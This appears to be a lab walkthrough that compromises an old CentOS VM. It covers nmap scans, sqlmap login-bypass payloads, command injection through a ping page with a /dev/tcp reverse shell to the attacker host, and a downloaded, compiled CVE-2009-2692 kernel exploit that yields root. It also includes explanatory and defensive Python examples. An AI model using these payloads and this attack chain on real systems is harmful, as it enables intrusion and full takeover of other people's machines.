Contents
Information gathering
1. Host discovery
nmap -sn 192.168.229.1/24
nmap -sn 192.168.229.1/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 20:58 EST
Nmap scan report for 192.168.229.69 // target found
Host is up (0.00047s latency).
MAC Address: 00:0C:29:EA:A2:84 (VMware)
Nmap scan report for 192.168.229.73
Host is up.
MAC Address: 1A:A0:01:1C:61:2B (Unknown)
Nmap scan report for 192.168.229.85
Host is up (0.21s latency).
MAC Address: 92:5E:53:E7:CD:5E (Unknown)
Nmap scan report for 192.168.229.136
Host is up (0.12s latency).
MAC Address: 58:1C:F8:E0:85:B7 (Intel Corporate)
Nmap scan report for 192.168.229.247
Host is up (0.00026s latency).
MAC Address: A0:59:50:BC:A9:49 (Intel Corporate)
Nmap scan report for 192.168.229.234
Host is up.
Nmap done: 256 IP addresses (6 hosts up) scanned in 5.69 seconds
2. Port scan
nmap -sT -p- -Pn 192.168.229.69
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 21:12 EST
Nmap scan report for 192.168.229.69
Host is up (0.0038s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
111/tcp open rpcbind
443/tcp open https
631/tcp open ipp
655/tcp open tinc
3306/tcp open mysql
Nmap done: 1 IP address (1 host up) scanned in 3.92 seconds
3. Service scan
Only the seven open ports are passed to -p, so -O has no closed port to fingerprint against; that is why nmap warns below that the OS guess may be unreliable. Adding one known-closed port to the list gives it a better sample.
nmap -sT -sV -sC --version-all -O -p 22,80,111,443,631,655,3306 192.168.229.69
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-06 21:15 EST
Nmap scan report for 192.168.229.69
Host is up (0.00046s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
| ssh-hostkey:
| 1024 8f:3e:8b:1e:58:63:fe:cf:27:a3:18:09:3b:52:cf:72 (RSA1)
| 1024 34:6b:45:3d:ba:ce:ca:b2:53:55:ef:1e:43:70:38:36 (DSA)
|_ 1024 68:4d:8c:bb:b6:5a:bd:79:71:b8:71:47:ea:00:42:61 (RSA)
80/tcp open http Apache httpd 2.0.52 ((CentOS))
|_http-server-header: Apache/2.0.52 (CentOS)
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 652/udp status
|_ 100024 1 655/tcp status
443/tcp open ssl/http Apache httpd 2.0.52 ((CentOS))
|_ssl-date: 2023-12-07T00:06:16+00:00; -2h09m29s from scanner time.
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
| sslv2:
| SSLv2 supported
| ciphers:
| SSL2_DES_64_CBC_WITH_MD5
| SSL2_RC4_64_WITH_MD5
| SSL2_DES_192_EDE3_CBC_WITH_MD5
| SSL2_RC2_128_CBC_WITH_MD5
| SSL2_RC4_128_WITH_MD5
| SSL2_RC4_128_EXPORT40_WITH_MD5
|_ SSL2_RC2_128_CBC_EXPORT40_WITH_MD5
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2009-10-08T00:10:47
|_Not valid after: 2010-10-08T00:10:47
|_http-server-header: Apache/2.0.52 (CentOS)
631/tcp open ipp CUPS 1.1
|_http-server-header: CUPS/1.1
|_http-title: 403 Forbidden
| http-methods:
|_ Potentially risky methods: PUT
655/tcp open status 1 (RPC #100024)
3306/tcp open mysql MySQL (unauthorized)
MAC Address: 00:0C:29:EA:A2:84 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 2.6.X
OS CPE: cpe:/o:linux:linux_kernel:2.6
OS details: Linux 2.6.9 - 2.6.30
Network Distance: 1 hop
Host script results:
|_clock-skew: -2h09m29s
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.40 seconds
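The three scans above are one pipeline: the ping sweep picks the host, the full-range TCP scan yields the port list, and that list feeds the -sV/-sC run whose script output then has to be read for the things that matter (SSHv1 on 22, SSLv2 and a certificate that expired in 2010 on 443, PUT on 631). The following Python is an added example, not code from this writeup: it parses nmap's normal-format output to build the -p argument for the next scan and to pull those findings out of the script output. The two sample outputs are constructed from the listings above (trimmed to the relevant lines); nothing is fetched from the network.

```python
import re
from datetime import datetime

# Constructed sample: the port table from the `nmap -sT -p- -Pn` run above.
PORT_SCAN_OUTPUT = """\
Nmap scan report for 192.168.229.69
Host is up (0.0038s latency).
Not shown: 65528 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
443/tcp  open  https
631/tcp  open  ipp
655/tcp  open  tinc
3306/tcp open  mysql
Nmap done: 1 IP address (1 host up) scanned in 3.92 seconds
"""

# Constructed sample: the lines of the -sV/-sC output that carry the weak-protocol hints.
SERVICE_SCAN_OUTPUT = """\
22/tcp   open  ssh      OpenSSH 3.9p1 (protocol 1.99)
|_sshv1: Server supports SSHv1
80/tcp   open  http     Apache httpd 2.0.52 ((CentOS))
443/tcp  open  ssl/http Apache httpd 2.0.52 ((CentOS))
| sslv2:
|   SSLv2 supported
| ssl-cert: Subject: commonName=localhost.localdomain
| Not valid before: 2009-10-08T00:10:47
|_Not valid after:  2010-10-08T00:10:47
631/tcp  open  ipp      CUPS 1.1
| http-methods:
|_  Potentially risky methods: PUT
"""

# One row of nmap's normal-format port table: "22/tcp   open  ssh   OpenSSH 3.9p1 ...".
# Only spaces/tabs are allowed between fields so a row never swallows the next line.
PORT_LINE = re.compile(r"^(\d+)/(tcp|udp)[ \t]+(\w+)[ \t]+(\S+)(?:[ \t]+(.*))?$", re.M)

def open_ports(scan_output):
    """Open ports from a port-table listing, in the order nmap printed them."""
    return [int(m.group(1)) for m in PORT_LINE.finditer(scan_output) if m.group(3) == "open"]

def port_arg(scan_output):
    """The -p argument for the follow-up -sV -sC scan, built from the full-range scan."""
    return ",".join(str(p) for p in open_ports(scan_output))

# (regex, label) pairs for NSE script lines worth a second look; matched per line.
FINDINGS = [
    (r"sshv1: Server supports SSHv1", "SSH protocol 1 enabled"),
    (r"^\|\s+SSLv2 supported", "SSLv2 enabled"),
    (r"Potentially risky methods: .*\bPUT\b", "HTTP PUT allowed"),
]

def flag_findings(service_output):
    """Attribute each script finding to the port whose block it appears under."""
    current_port, results = None, []
    for line in service_output.splitlines():
        m = PORT_LINE.match(line)
        if m:
            current_port = int(m.group(1))
            continue
        for pattern, label in FINDINGS:
            if re.search(pattern, line):
                results.append((current_port, label))
    return results

def cert_expired(service_output, at_iso):
    """True if the ssl-cert 'Not valid after' date lies before the ISO-8601 time at_iso."""
    m = re.search(r"Not valid after:\s+(\S+)", service_output)
    return bool(m) and datetime.fromisoformat(m.group(1)) < datetime.fromisoformat(at_iso)

if __name__ == "__main__":
    print("next scan: nmap -sT -sV -sC -O -p", port_arg(PORT_SCAN_OUTPUT), "192.168.229.69")
    for port, label in flag_findings(SERVICE_SCAN_OUTPUT):
        print("port %d: %s" % (port, label))
    print("certificate expired at scan time:",
          cert_expired(SERVICE_SCAN_OUTPUT, "2023-12-07T00:06:16"))
```

Feeding it real output is a matter of reading the file nmap wrote with -oN; for anything larger than a single host, nmap's -oX plus an XML parser is the more robust route, but the normal-format regex above is enough for a one-box walkthrough.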
Web penetration:
Visiting the site reveals a login page.
4. SQL injection
First we confirm with Burp Suite that the form is submitted as a POST request, then hand the captured request to sqlmap and let it do the work.
Save the request to 1.txt and run sqlmap with -r so it reads the request from that file:
┌──(root㉿kali)-[/home/kali/Desktop]
└─# sqlmap -r '1.txt' --level 5 --risk 3
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.7.8#stable}
|_ -| . [(]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 22:10:51 /2023-12-06/
[22:10:51] [INFO] parsing HTTP request from '1.txt'
[22:10:51] [INFO] testing connection to the target URL
[22:10:51] [INFO] testing if the target URL content is stable
[22:10:52] [INFO] target URL content is stable
[22:10:52] [INFO] testing if POST parameter 'uname' is dynamic
[22:10:52] [WARNING] POST parameter 'uname' does not appear to be dynamic
[22:10:52] [WARNING] heuristic (basic) test shows that POST parameter 'uname' might not be injectable
[22:10:52] [INFO] testing for SQL injection on POST parameter 'uname'
-------------
Parameter: psw (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: uname=admin&psw=-3635' OR 6390=6390-- ZtJm&btnLogin=Login
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: uname=admin&psw=rooot' AND 4175=BENCHMARK(5000000,MD5(0x4c677766))-- LVAp&btnLogin=Login
Parameter: uname (POST)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: uname=-3300' OR 1388=1388-- yOfD&psw=rooot&btnLogin=Login
Type: time-based blind
Title: MySQL < 5.0.12 AND time-based blind (BENCHMARK)
Payload: uname=admin' AND 3078=BENCHMARK(5000000,MD5(0x6c69784a))-- YDPQ&psw=rooot&btnLogin=Login
---
there were multiple injection points, please select the one to use for following injections:
[0] place: POST, parameter: uname, type: Single quoted string (default)
[1] place: POST, parameter: psw, type: Single quoted string
[q] Quit
>
sqlmap found injection points in both fields and reported four payloads: a boolean-based and a time-based one for each of uname and psw. The OR boolean-based payloads are the ones that bypass authentication (the BENCHMARK ones only confirm injection); submitting either of them through the login form logs us in, and the page behind the login is a ping utility that runs a command.
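Why the "-3300' OR 1388=1388-- yOfD" payload logs us in: the closing quote ends the string literal, OR 1388=1388 makes the WHERE clause true for every row, and the comment eats the rest of the query including the password check. The following Python is an added example, not code from this writeup or from the target application (whose source is not known): a login check built by string concatenation, the query text it actually sends, and the parameterized version that treats the same payload as a literal. SQLite is used so it runs offline; the boolean-based payloads behave the same in MySQL, while the BENCHMARK() time-based payloads are MySQL-only and are not reproduced. The users table and password are constructed.

```python
import sqlite3

# Constructed stand-in for the target's user table; the real schema is not known.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (uname TEXT, psw TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'S3cret!')")
    return db

def render_vulnerable_sql(uname, psw):
    """The query text a concatenating login handler hands to the database."""
    return "SELECT uname FROM users WHERE uname='%s' AND psw='%s'" % (uname, psw)

def login_vulnerable(db, uname, psw):
    """Login check built by string concatenation (the flaw sqlmap found on the target).
    Returns the matched user name, or None."""
    row = db.execute(render_vulnerable_sql(uname, psw)).fetchone()
    return row[0] if row else None

def login_fixed(db, uname, psw):
    """Parameterized query: the payload is compared as a literal, never parsed as SQL."""
    row = db.execute("SELECT uname FROM users WHERE uname=? AND psw=?",
                     (uname, psw)).fetchone()
    return row[0] if row else None

# The two boolean-based payloads from the sqlmap output above (URL-decoded form values).
UNAME_PAYLOAD = "-3300' OR 1388=1388-- yOfD"
PSW_PAYLOAD = "-3635' OR 6390=6390-- ZtJm"

if __name__ == "__main__":
    db = make_db()
    # What the database sees: uname='-3300' OR 1388=1388-- yOfD' AND psw='rooot'
    print(render_vulnerable_sql(UNAME_PAYLOAD, "rooot"))
    print("vulnerable, uname payload:", login_vulnerable(db, UNAME_PAYLOAD, "rooot"))
    print("vulnerable, psw payload:  ", login_vulnerable(db, "admin", PSW_PAYLOAD))
    print("fixed, uname payload:     ", login_fixed(db, UNAME_PAYLOAD, "rooot"))
```

The psw payload works for the same reason with a different shape: uname='admin' AND psw='-3635' OR 6390=6390 is (false) OR (true), because AND binds tighter than OR.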
5. Remote command execution (filter bypass)
The ping function hands the address to a shell, so a second command appended with && runs after the ping; the test command executes successfully.
Next we try a reverse shell. The >& /dev/tcp/... redirection is a bash feature; it works here because the shell the web application invokes is /bin/sh, which on this CentOS box is bash 3.0 (the sh-3.00# prompt later confirms it):
kali: nc -lvvp 4444
web: 127.0.0.1 && /bin/sh -i >& /dev/tcp/192.168.229.234/4444 0>&1
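To make the mechanism behind that payload concrete, here is an added Python example (mine, not code from this writeup or from the target's ping page, whose implementation is not known): a ping handler that concatenates the host into a shell command line, beside a version that passes the host as its own argv element and a version that also validates it as an IP address. echo stands in for ping so it runs offline; the shell, not the command, is what interprets &&, so the injection behaves identically. The INJECTED payload is constructed to have the same shape as the reverse shell above while doing nothing harmful.

```python
import ipaddress
import subprocess

# `echo` stands in for `ping` so the demonstration runs offline; the injection
# mechanics are identical because the shell, not the command, parses the && separator.

def ping_vulnerable(host):
    """Concatenates user input into one command line that /bin/sh parses."""
    out = subprocess.run("echo PING " + host, shell=True, capture_output=True, text=True)
    return out.stdout

def ping_argv_only(host):
    """No shell: the input becomes a single argv element, so && is only text."""
    out = subprocess.run(["echo", "PING", host], capture_output=True, text=True)
    return out.stdout

def validate_host(host):
    """Accept only a literal IPv4/IPv6 address; anything else raises ValueError."""
    return str(ipaddress.ip_address(host))

def is_valid_host(host):
    try:
        validate_host(host)
        return True
    except ValueError:
        return False

def ping_fixed(host):
    """Both layers: validated input, passed to the command without a shell."""
    out = subprocess.run(["echo", "PING", validate_host(host)],
                         capture_output=True, text=True)
    return out.stdout

# Constructed payload with the shape of the reverse shell above, but harmless.
INJECTED = "127.0.0.1 && echo INJECTED"

if __name__ == "__main__":
    print("shell=True :", repr(ping_vulnerable(INJECTED)))   # second command runs
    print("argv only  :", repr(ping_argv_only(INJECTED)))    # && echoed back as text
    print("validated  :", is_valid_host(INJECTED), is_valid_host("127.0.0.1"))
```

The argv form alone already stops the injection; the validation is the second layer, so that a hostname field never carries anything but an address even if someone later reintroduces a shell.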
6. Privilege escalation
We go for a kernel exploit: find one with searchsploit, copy the source out, serve it over HTTP from Kali, then download, compile and run it on the target.
searchsploit linux 2.6 centos
searchsploit -m 9479.c
python3 -m http.server 8080
┌──(root㉿kali)-[/home/kali/Desktop]
└─# searchsploit linux 2.6 centos
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Linux Kernel 2.4.x/2.6.x (CentOS 4.8/5.3 / RHEL 4.8/5.3 / SuSE 10 SP2/11 / Ubuntu 8.10) (PPC) - 'sock_sendpage()' Local Privilege | linux/local/9545.c
Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation | linux/local/9479.c
Linux Kernel 2.6 < 2.6.19 (White Box 4 / CentOS 4.4/4.5 / Fedora Core 4/5/6 x86) - 'ip_append_data()' Ring0 Privilege Escalation ( | linux_x86/local/9542.c
Linux Kernel 2.6.32 < 3.x (CentOS 5/6) - 'PERF_EVENTS' Local Privilege Escalation (1) | linux/local/25444.c
Linux Kernel 2.6.x / 3.10.x / 4.14.x (RedHat / Debian / CentOS) (x64) - 'Mutagen Astronomy' Local Privilege Escalation | linux_x86-64/local/45516.c
----------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
┌──(root㉿kali)-[/home/kali/Desktop]
└─# searchsploit -m 9479.c
Exploit: Linux Kernel 2.4/2.6 (RedHat Linux 9 / Fedora Core 4 < 11 / Whitebox 4 / CentOS 4) - 'sock_sendpage()' Ring0 Privilege Escalation (5)
URL: https://www.exploit-db.com/exploits/9479
Path: /usr/share/exploitdb/exploits/linux/local/9479.c
Codes: CVE-2009-2692, OSVDB-56992
Verified: True
File Type: C source, ASCII text
Copied to: /home/kali/Desktop/9479.c
┌──(root㉿kali)-[/home/kali/Desktop]
└─# python3 -m http.server 8080
Serving HTTP on 0.0.0.0 port 8080 (http://0.0.0.0:8080/) ...
On the target, download and compile the exploit, then run it:
wget http://192.168.229.234:8080/9479.c
gcc -o 1 9479.c
sh-3.00# wget http://192.168.229.234:8080/9479.c
--20:54:16-- http://192.168.229.234:8080/9479.c
=> `9479.c'
Connecting to 192.168.229.234:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3,378 (3.3K) [text/x-csrc]
0K ... 100% 247.81 MB/s
20:54:16 (247.81 MB/s) - `9479.c' saved [3378/3378]
sh-3.00# ls
9479.c
sh-3.00# gcc -o 1 9479.c
9479.c:130:28: warning: no newline at end of file
sh-3.00# ls
1
9479.c
sh-3.00# ./1
[-] check ur uid
sh-3.00# id
uid=0(root) gid=0(root) groups=48(apache)
sh-3.00# whoami
root
The exploit itself reports "[-] check ur uid" (its own uid check failed), yet the shell that launched it has been elevated: id in that same shell now shows uid=0(root) gid=0(root), with the original supplementary group 48(apache) still present.
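A kernel exploit that misfires can panic the box and cost the shell, so it is worth a pre-flight check before fetching and compiling one. The following Python is an added example, not part of this writeup and not derived from 9479.c: it compares a uname -r string against the kernel ranges CVE-2009-2692 (the CVE searchsploit lists for 9479.c) covers, 2.4.4 through 2.4.37.4 and 2.6.0 through 2.6.30.4, and reads vm.mmap_min_addr, since the page-zero mapping this exploit family relies on is refused to unprivileged processes when that sysctl is non-zero. The release string 2.6.9-89.EL is a constructed example of a CentOS 4 kernel; the target's actual uname output is not shown on this page. Vendor kernels backport fixes without changing these numbers, so a match is a reason to try, not proof.

```python
import platform
import re
import sys

# Kernel ranges affected by CVE-2009-2692 (inclusive): 2.4.4 - 2.4.37.4 and 2.6.0 - 2.6.30.4.
# Distro kernels backport fixes without bumping these numbers, so "in range" means
# "worth trying", not "vulnerable".
AFFECTED = [((2, 4, 4, 0), (2, 4, 37, 4)), ((2, 6, 0, 0), (2, 6, 30, 4))]

def parse_kernel(release):
    """'2.6.9-89.EL' -> (2, 6, 9, 0); '2.6.30.4' -> (2, 6, 30, 4). Suffixes are dropped."""
    m = re.match(r"(\d+)\.(\d+)\.(\d+)(?:\.(\d+))?", release)
    if not m:
        raise ValueError("unrecognised kernel release: %r" % release)
    return tuple(int(x) if x else 0 for x in m.groups())

def sock_sendpage_affected(release):
    """True if the release number falls inside one of the CVE-2009-2692 ranges."""
    v = parse_kernel(release)
    return any(lo <= v <= hi for lo, hi in AFFECTED)

def mmap_min_addr(path="/proc/sys/vm/mmap_min_addr"):
    """Current vm.mmap_min_addr. Kernels that predate the sysctl (2.6.9 among them)
    have no such file; that is reported as 0, i.e. page zero is mappable."""
    try:
        with open(path) as f:
            return int(f.read().strip())
    except (FileNotFoundError, ValueError):
        return 0

def assess(release, min_addr):
    """One-line verdict combining the version check and the page-zero check."""
    if not sock_sendpage_affected(release):
        return "kernel %s is outside the CVE-2009-2692 range" % release
    if min_addr:
        return ("kernel %s is in range, but mmap_min_addr=%d refuses the page-zero mapping"
                % (release, min_addr))
    return "kernel %s is in range and page zero is mappable: try the exploit" % release

if __name__ == "__main__":
    # On the target: `python3 precheck.py`; elsewhere, pass a uname -r string to test.
    release = sys.argv[1] if len(sys.argv) > 1 else platform.release()
    print(assess(release, mmap_min_addr()))
```

The version test is deliberately the weaker of the two checks; the sysctl read is what most often separates a box that drops to root from one that prints "[-] check ur uid" and nothing else.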